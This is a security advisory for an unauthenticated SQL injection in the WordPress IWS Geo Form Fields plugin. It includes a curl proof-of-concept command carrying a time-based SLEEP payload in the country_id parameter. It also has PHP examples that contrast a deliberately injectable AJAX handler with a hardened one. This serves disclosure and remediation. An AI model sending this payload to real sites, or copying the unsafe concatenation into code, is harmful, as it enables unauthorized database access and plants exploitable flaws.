Bug Name: WordPress IWS Geo Form Fields <=1.0 - SQL Injection
Severity: critical
Priority: P1
Risk Level: CRITICAL - 10/10
CVSS Score: 9.8
Description:
WordPress IWS Geo Form Fields plugin through 1.0 contains a SQL injection vulnerability. The plugin does not properly escape a request parameter before using it in a SQL statement, and the statement is reachable through an AJAX action that is available to unauthenticated users. An attacker may be able to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
Exploit Commands (bash):
curl -i -s -k -X 'POST' \
'https://example.com/wp-admin/admin-ajax.php?action=iws_gff_fetch_states' \
-H '@timeout: 15s' \
-H 'Host: example.com' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-raw 'country_id=1%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(6)))b)' \
--max-time 15
⚠️ Warning: These commands are for authorized security testing only. Unauthorized access is illegal.
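Mitigation pattern, as an added illustration for this advisory rather than the plugin's own code: a hypothetical WordPress AJAX handler showing the unsafe concatenation the description refers to next to a hardened version that validates the type and binds the value with $wpdb->prepare(). The function names, the table name iws_gff_states and the nonce action name are assumptions.

```php
<?php
// Added example for this advisory; hypothetical handler, not the plugin's code.
// Assumed names: the two functions below, the table {prefix}iws_gff_states,
// and the nonce action 'iws_gff_fetch_states'.

// UNSAFE pattern: the request value is pasted straight into the SQL text,
// so a country_id such as "1 AND (SELECT ... SLEEP(6) ...)" becomes part of the query.
function iws_gff_fetch_states_unsafe() {
    global $wpdb;
    $country_id = isset( $_POST['country_id'] ) ? $_POST['country_id'] : '';
    $rows = $wpdb->get_results(
        "SELECT id, name FROM {$wpdb->prefix}iws_gff_states WHERE country_id = " . $country_id
    );
    wp_send_json_success( $rows );
}

// HARDENED: enforce the expected type, then bind through a %d placeholder.
function iws_gff_fetch_states_safe() {
    global $wpdb;
    // Tie the request to a nonce issued with the form (assumed nonce action name).
    check_ajax_referer( 'iws_gff_fetch_states', 'nonce' );

    // absint() coerces to a non-negative integer; anything non-numeric becomes 0.
    $country_id = isset( $_POST['country_id'] ) ? absint( $_POST['country_id'] ) : 0;
    if ( 0 === $country_id ) {
        wp_send_json_error( array( 'message' => 'invalid country_id' ), 400 );
    }

    // $wpdb->prepare() substitutes the integer; the SQL structure cannot change.
    $sql  = $wpdb->prepare(
        "SELECT id, name FROM {$wpdb->prefix}iws_gff_states WHERE country_id = %d",
        $country_id
    );
    $rows = $wpdb->get_results( $sql );
    wp_send_json_success( $rows );
}

// Only the hardened handler is registered, for logged-in and anonymous callers alike.
add_action( 'wp_ajax_iws_gff_fetch_states', 'iws_gff_fetch_states_safe' );
add_action( 'wp_ajax_nopriv_iws_gff_fetch_states', 'iws_gff_fetch_states_safe' );
```

When a time-based probe like the one above is sent to the hardened handler, absint() reduces the payload to 1 and the response returns promptly, which is also a quick way to confirm a fix.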
Thanks for reading! If you found this useful, feel free to share it with your fellow hunters. Happy hacking!

